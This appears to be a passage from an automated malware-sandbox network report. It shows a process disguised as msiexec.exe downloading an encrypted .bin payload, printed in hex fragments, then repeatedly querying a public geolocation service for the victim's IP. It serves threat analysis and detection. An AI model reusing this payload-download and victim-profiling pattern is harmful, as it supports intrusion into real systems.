                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="GedMSrTYyMf22.bin"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 275008
                                                                            Last-Modified: Sun, 20 Oct 2024 22:55:43 GMT
                                                                            X-GUploader-UploadID: AHmUCY2CcbluqA1bG5XUh7i67YDPc_jxa4r5dkAWl-HdeMPvVZC3Iy-rLu36-nWEF6qPapEm6_aw1GqBtw
                                                                            Date: Mon, 21 Oct 2024 09:04:07 GMT
                                                                            Expires: Mon, 21 Oct 2024 09:04:07 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=5Yambg==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-10-21 09:04:07 UTC4897INData Raw: 65 8e c9 0b dd 61 87 d2 ba 07 db 81 0b 18 a5 c9 79 f9 70 4c f5 1f 98 2c d1 6c f1 50 58 b9 93 9b d9 51 9d b1 42 dc d0 47 a6 57 2b ee 1c 53 0e 6a be 5c 12 bb 39 57 40 ed 28 22 b4 7e 68 bf 1a ea c3 71 03 be bd 9c 00 6f 2d 63 61 1c 6d 0a 4f 29 f3 b2 a5 e3 a0 a0 68 58 c7 5d b5 d4 e5 c0 ac 6e 21 5b 3d c4 0a 2d a9 22 61 a7 b0 06 b8 4d 1d 51 33 12 a7 44 99 c4 a7 08 3e 34 47 7b 1e f5 83 3c f8 f5 c9 80 5d 31 8a 5c 96 06 39 81 b7 91 45 e2 ab 3d c2 9d 0e 87 bb 8a d5 a0 cc 7e dd 4a a2 8e 6d 61 aa 84 d3 4a 54 23 15 22 b6 6f e0 0f f3 91 b6 d1 fa 62 fd e6 d3 ee a9 d6 be 01 14 57 28 b0 07 d7 e4 1d 49 0b ba 67 5c 60 87 11 bf ce b6 e8 86 e8 c2 db 5c 2c a8 39 34 42 58 60 72 c7 a5 16 ad 71 92 79 92 b7 34 82 ce e0 e1 80 5f 01 8c 5a d5 94 b5 9e 10 6a 2e dc 8c 4f ae 7b 64 06 59
                                                                            Data Ascii: eaypL,lPXQBGW+Sj\9W@("~hqo-camO)hX]n![=-"aMQ3D>4G{<]1\9E=~JmaJT#"obW(Ig\`\,94BX`rqy4_Zj.O{dY
                                                                            2024-10-21 09:04:07 UTC4897INData Raw: 50 ce 80 a7 37 a6 4e 5e fc 5c 86 68 6a fc 4a 42 7e a8 45 61 e6 cd 71 76 58 fa 1e c3 56 0f 64 0b 4a 10 88 9a 98 bf a7 98 fa 12 34 b5 c4 e8 dd ae 4e bf a3 e0 d8 d2 27 58 70 b4 19 89 d2 8f 82 7d f8 cc a3 e5 dd 20 9b a7 7a 76 e6 ff 86 25 78 de b4 da ee a8 2d 67 26 dc 30 5f eb eb 7e 07 38 11 9b a3 82 93 33 9c 7d 91 31 0e 5c 38 50 c8 44 45 3a e1 cb 30 6a c3 77 10 e7 ec cb 90 63 35 57 c8 f1 26 0d 46 7b 14 b3 86 37 7b 66 13 55 f0 10 d6 7e 10 6b fb 26 b6 4c 9b 63 32 06 f9 78 f8 7b ec 8e 90 3f 17 11 13 42 b9 d6 72 f0 ea 51 88 55 85 5e a0 34 d5 fe fd b9 69 66 01 50 a0 ad 01 f5 c9 c9 e5 59 d0 91 5e 71 64 3f 8f d4 0b c3 86 62 be 20 9c 89 8c c1 42 ef 1d 5c 38 50 82 80 4c af 73 84 c4 c8 c2 c8 e8 73 3a 36 f3 e3 57 96 28 14 71 f3 58 6e 01 d6 88 3c 33 d8 d6 af 4e 95 b1 49
                                                                            Data Ascii: P7N^\hjJB~EaqvXVdJ4N'Xp} zv%x-g&0_~83}1\8PDE:0jwc5W&F{7{fU~k&Lc2x{?BrQU^4ifPY^qd?b B\8PLss:6W(qXn<3NI
                                                                            2024-10-21 09:04:07 UTC3INData Raw: cd f6 5e
                                                                            Data Ascii: ^
                                                                            2024-10-21 09:04:07 UTC1327INData Raw: 23 74 a3 65 34 47 88 07 ad 95 9f cf 31 11 97 6a 87 74 15 64 5e 08 f3 0d 5e a1 2b 34 b3 6d b3 ad 9e 46 63 17 21 a5 87 6c 6d e8 13 55 28 fa 98 5e 6f 9b cd 5e 7e ba a7 67 7b 8e 0e 2b 73 1c 60 7c dc cc fa ef 73 7e 55 24 41 c3 af ab fb d8 2a 51 a2 8f 01 91 68 22 0d bb b8 33 3f 2a 6b 09 e1 4d 7b 5a 66 db 0d 64 19 3d 5d e1 55 78 0b 99 3d c5 9e 2b e3 96 0a 9c 00 65 5b f3 71 1c e2 dd 14 29 4b b8 ca 24 a0 a0 62 58 96 55 a8 59 a5 c0 ac 6f 04 4d 4f 90 05 2d d9 80 44 b0 98 b2 b8 4d 17 f3 16 0a d5 2a 96 c4 d7 aa 1b 2d 39 43 9e f5 87 9e d3 f0 01 1c 52 85 f3 33 92 a5 46 e7 7a b0 15 28 e7 52 90 4d 73 e8 ac 5a 9c b8 ec 1d b6 4b 04 e1 19 4b c8 9f cf 38 21 49 46 82 d8 4f ae 53 a9 cf ea be 9e 03 a1 bc dc e4 fd c0 96 80 14 57 22 a6 a9 93 f7 17 14 00 95 6b 94 ec 00 18 75 ce b6
                                                                            Data Ascii: #te4G1jtd^^+4mFc!lmU(^o^~g{+s`|s~U$A*Qh"3?*kM{Zfd=]Ux=+e[q)K$bXUYoMO-DM*-9CR3Fz(RMsZKK8!IFOSW"ku
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 94 2d 0e 4b 97 c8 1e 56 9d 15 bf f3 c1 fa 01 b9 2f c5 23 c2 f7 26 3b db 23 7c b6 3a 40 12 7e 5c 1b 7d 6d 34 20 de 88 f0 b4 e0 79 28 33 82 c1 46 3c d3 61 b3 d2 a6 bb 65 76 0e 58 01 47 2c 58 ea e7 fd 74 c0 c3 16 77 33 63 d5 e4 63 26 a9 b8 b0 1a 1b 28 84 bd c5 23 ea e4 f5 e0 2d b2 72 5d 31 cc 05 30 e7 64 6a 75 fd ed 48 97 8e 99 83 ae 30 db 9b c9 f7 d5 12 4f b4 f1 23 ae 4a 72 24 8a 57 b8 5a ce cf 19 fc 4b 46 0f f3 d3 f1 8f 02 b2 db fd 8c 4b 66 2d 21 6b 11 38 eb 3e 83 57 a5 e9 af 04 df 47 dd 27 0a 47 c9 a6 ab 4c 21 57 5e 96 67 8c 8c 3d 56 89 dd 74 9c 7e f0 48 af f2 d9 e3 c3 d9 46 78 d1 de 20 98 7d a6 d4 46 34 e7 ce 8e 74 f9 e7 fb 99 a9 ec 46 10 a1 08 fe 4d d1 c2 04 a7 f6 6c 94 7b 98 11 94 2e bd 35 d9 5c 6d 95 9a 6d a7 34 88 ac d2 e2 9e 01 09 ba c1 75 60 91 9e
                                                                            Data Ascii: -KV/#&;#|:@~\}m4 y(3F<aevXG,Xtw3cc&(#-r]10djuH0O#Jr$WZKFKf-!k8>WG'GL!W^g=Vt~HFx }F4tFMl{.5\mm4u`
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 40 76 0d 9a 1c 7e df 58 95 7d ad 08 cf fd 65 81 3f 56 56 c5 5f b0 89 f3 39 f4 1d 1b a8 12 d6 d9 ca 20 14 b1 27 0b 06 32 f3 7d 8d a5 39 e2 ea 1a 6e bb 50 71 85 82 c8 12 4e 72 2b 52 86 e6 0c 65 0a ca f7 f0 74 70 f9 4c ec 3a 3f 38 bd f8 ee a9 e9 64 c5 44 1a 86 4f e0 a7 7f a2 4c b5 d9 25 eb ed 70 03 35 db f4 c4 87 69 cf af 57 a0 4c d9 e1 6b 80 0c a5 67 6b 0f 4d db 4c 98 63 c3 e5 b4 8e 09 a4 66 61 3a 5f e2 4a 6e 5f 99 91 05 06 c1 2e 36 a9 79 cb 40 3d d6 73 5c 41 2b 8a 5f 80 0a d0 aa 47 7d a7 5a 3f 41 26 72 44 d1 57 f1 08 e8 50 3b c7 8a 76 c1 12 8c 5a 0b b5 58 a2 8f b2 9a fc 33 3e d4 a8 75 c5 6c ef bf 32 53 20 60 80 93 f1 39 39 54 3b 54 a9 d5 cb c7 ac d1 aa 41 db 8d 08 28 b4 f6 18 af 7b 81 8b bb b9 be 28 2e 2a 9b bd 07 a3 24 c6 dc 85 d5 7c e6 59 a1 3f 37 c4 f7
                                                                            Data Ascii: @v~X}e?VV_9 '2}9nPqNr+RetpL:?8dDOL%p5iWLkgkMLcfa:_Jn_.6y@=s\A+_G}Z?A&rDWP;vZX3>ul2S `99T;TA({(.*$|Y?7
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 5b 3d ce 78 77 a8 22 11 b1 98 87 b8 4d 17 47 cd 11 ad 42 a0 66 a0 08 3e 4a 74 7b 9e f1 f1 6b f4 ea 03 98 75 04 83 91 bd a8 c6 cc 71 b7 28 ae c3 4e e2 f9 ac bd dc f8 b5 e5 c1 1d bc 2e be d3 09 41 b8 f6 7e 3b 21 4d 34 6e ce 31 e0 40 a0 b5 f3 ba 9e 07 d5 84 67 e4 8d dc cc 09 01 57 58 98 0c 92 e4 17 7b 41 b9 67 81 cd 5d 77 bf c4 c8 f7 86 e8 c6 f3 f6 2c aa 32 9d 57 1c 74 5a 61 a1 16 a7 11 11 79 92 b6 38 82 08 a9 95 90 5f 51 e3 e1 d5 d4 bb 9e 18 14 2c dc 8c 6b d0 38 64 04 5d 5c b6 a3 de 38 1b e1 92 0c de 35 8c df 9b 96 07 29 2f a8 ea 84 f6 a0 fc de 49 c0 0b 28 c2 22 dd 64 30 b8 20 c9 77 1d 0a 6a 4c eb 05 b1 bb e5 ef cf 63 83 6b 42 56 e1 92 22 35 35 26 c6 b5 21 c4 c3 04 6d c5 40 b0 56 cd 89 cc 04 f5 b5 68 85 86 83 0a c9 0a 3e 95 50 28 c5 f4 de 81 20 b1 ae 39 74
                                                                            Data Ascii: [=xw"MGBf>Jt{kuq(N.A~;!M4n1@gWX{Ag]w,2WtZay8_Q,k8d]\85)/I("d0 wjLckBV"55&!m@Vh>P( 9t
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 42 7c f7 06 a7 f1 5a 55 ae d0 92 6b f0 c2 ec bb 1d fd 5c 75 a9 2d e6 35 bf dc 1f b8 8f 49 8d 0f a0 11 ac e9 1f 10 c3 2e ff 8c b2 6b 05 11 99 d2 d8 e2 92 05 ab b7 aa 07 c0 94 9e 9f 95 14 d3 93 c8 71 24 8d 83 8a 28 d4 82 ef 51 b4 2a 87 69 ff 73 a2 f5 36 15 e0 d2 91 4d c9 55 7b 8d f0 a5 6b 9e 4c dd bb 9c 71 9e 7c bd 18 de af ee 1d 53 4c 3f 55 ed a1 f5 8d b8 86 3c c6 03 b2 83 42 fd 7d a1 7c 95 83 2b 9a 7d 84 4a 67 74 6c fb dc 50 57 47 61 13 7f ee 01 3c f7 85 7f 16 ba 93 ff df 3c c9 8c b6 60 be 61 f7 9a ce 56 65 e2 4d 51 00 e7 f0 5d fb fc bc 57 81 6e 44 dd 72 b6 91 9a b4 20 fb cf 71 d8 bd 97 74 2c 8f 5f dd 55 ae c2 b2 8b 64 1f d4 7b 84 d3 5c 71 9d b4 5c 88 92 1c 2c fc a6 eb 4a 22 d2 9a f8 07 a5 cf 04 6a c1 81 fd 72 c2 f5 3b 87 e2 85 69 0c 73 31 cf 78 ec 80 18
                                                                            Data Ascii: B|ZUk\u-5I.kq$(Q*is6MU{kLq|SL?U<B}|+}JgtlPWGa<<`aVeMQ]WnDr qt,_Ud{\q\,J"jr;is1x
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 76 c2 6f 58 1d 5c 0d 20 1e a1 93 f8 52 bb bf 3b 5e a3 18 cb b9 93 fd ad 4c c6 9e 19 28 ce e0 ec f0 68 a4 a9 99 47 bf 31 30 3f 96 ac bc a3 24 cc 17 ce a5 7c e6 53 a1 1f 49 fa f7 37 76 7a f1 4c 0d 35 2b 58 bc 44 2c da c9 19 2e 52 c5 bd a1 0e 47 4e 5e fc fc a7 68 7b f5 14 7b 6d a5 5a 76 ce 4c 7b 76 8e 32 f0 e7 6d 3d 75 0d 79 33 86 9a b0 dd b3 66 f6 f1 34 b5 e8 9b 1d ef 02 b5 8b 23 d8 d2 2d 02 03 76 19 be d9 9c 85 fd fe b2 99 eb dd 24 e8 64 7a 76 ec 92 42 25 78 79 b5 cb e9 dc e8 67 26 1e 4f 62 eb e5 7a 68 fe 11 9b a9 82 82 34 ee 07 80 31 7e 74 5b 51 c8 4e ef ab f1 cb 50 42 98 77 55 ed 83 0d 8b 53 3c 57 68 f6 3b 80 15 7b 14 a3 a3 21 21 19 05 55 8a b9 f4 41 62 df fb 2c bf 81 e2 7b 40 62 99 1c 88 d9 c3 97 e9 18 07 9c 48 e0 9c cd 6f ae e9 51 f2 f7 a7 42 b1 72 d5
                                                                            Data Ascii: voX\ R;^L(hG10?$|SI7vzL5+XD,.RGN^h{{mZvL{v2m=uy3f4#-v$dzvB%xyg&Obzh41~t[QNPBwUS<Wh;{!!UAb,{@bHoQBr
                                                                            2024-10-21 09:04:07 UTC1378INData Raw: 2e 12 68 80 c1 12 e9 ad c0 f6 bb f9 a6 73 34 9a cb 88 20 05 1f 3f c8 2f 04 df b9 ba 48 df 36 e4 bb cd f9 64 83 cb d7 3a ad 92 87 d8 4e 3e 39 bd 46 22 da 0a f6 f4 2a bc ac 5f a6 e3 d0 59 e2 0a 30 4e 26 2b f3 5f 6a af 4e e0 45 b4 4d 70 b8 1e 80 68 f3 d4 64 69 b4 d0 c1 b8 6c ea 07 c8 ce 2b 2e 16 56 f2 6f 58 01 3c 7b c4 4e 96 48 4e 55 5f ac c2 ec 93 b4 98 21 2c 52 b3 6c 0c f3 46 b2 33 19 83 62 bf 9d d1 a3 d9 bd 00 14 73 d6 00 01 d6 23 06 58 b5 b4 bb 23 c9 fe 2c d3 f9 15 0c 98 d3 77 1f 53 f8 11 38 78 e6 d6 e2 37 ce b8 6d c3 30 d8 c2 f1 01 19 c9 3b a4 97 0b fb ce 46 84 fd db 71 30 bb 06 1a 5b b7 e3 f2 a3 ec 58 0e e1 15 73 09 f4 c4 a9 57 ac 75 1e ec 10 70 b9 1f 9c ba 24 c5 6e 93 ac 88 e1 79 a1 f8 09 16 df 30 74 6d c3 bb 57 9d ab c8 7c 7a 4e 74 30 0d fa 8b 4d 6f
                                                                            Data Ascii: .hs4 ?/H6d:N>9F"*_Y0N&+_jNEMphdil+.VoX<{NHNU_!,RlF3bs#X#,wS8x7m0;Fq0[XsWup$ny0tmW|zNt0Mo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.462511188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:10 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:10 UTC892INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:10 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27115
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ylCrTychrdADC2lRfv4QTNbZcUWi98v925KMrt2ni7xOQwF9utzpVGmPBdAY9KGYTcrOQMBvS%2FqOt2y6AMqjz2V7n10Xj6vTsQbNBzzSI7PL5DvbWkuUJbBZEx1S%2F7cy5epWUhNb"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60141f086d467e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2535901&cwnd=251&unsent_bytes=0&cid=13c55627ebf736e6&ts=158&x=0"
                                                                            2024-10-21 09:04:10 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.462512188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:10 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-21 09:04:11 UTC896INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:11 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27115
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qA7%2BH8Fqsguwnjz8a9KaG7xGm57g8w46XG9d4JEHZJkoZsy3JDGjbkhB13NUnwMp3iLhBMXppC2j2kBV9ggDZcTp1xiK0YnkIAMIRit5u6SSxm3%2FLQF%2B44QwUN%2BdV50Wbwj1tqxG"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d601424a81ce79e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1341&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2217457&cwnd=232&unsent_bytes=0&cid=efb1176bbc836dc2&ts=145&x=0"
                                                                            2024-10-21 09:04:11 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.462514188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:12 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:12 UTC895INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:12 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27117
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHKdn3qO5uX%2FX%2Fk5XQKpLe0lh%2BIBni2K9PNvVniV1i8qPOSyoQsgyYmEsOsbhlG0pKsgmetNmwnSc1Fx3e5XPeUoZRJpYy7Z9Imgg54g%2FfC1hQ3cg4T5lOekobdAz66JpBYhOByj"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60142d8973e736-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1836&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1563714&cwnd=32&unsent_bytes=0&cid=09d9890fd07d810c&ts=148&x=0"
                                                                            2024-10-21 09:04:12 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.462516188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:13 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-21 09:04:13 UTC890INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:13 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27118
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWhV0lmZsljuzaasilpotzLBR2yKgqkPemh3MGtAExA0XNhBJ7gI0YlyjED23qtpC5OJp9kYvt5PfQUE9QpobErCkaHABMjcfrGR5MVZvLIssB%2BLqG71XuqN2S9PFJKh5McBVrOh"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60143658eb4602-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1114&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=e8de03e6da502a24&ts=151&x=0"
                                                                            2024-10-21 09:04:13 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.462518188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:15 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
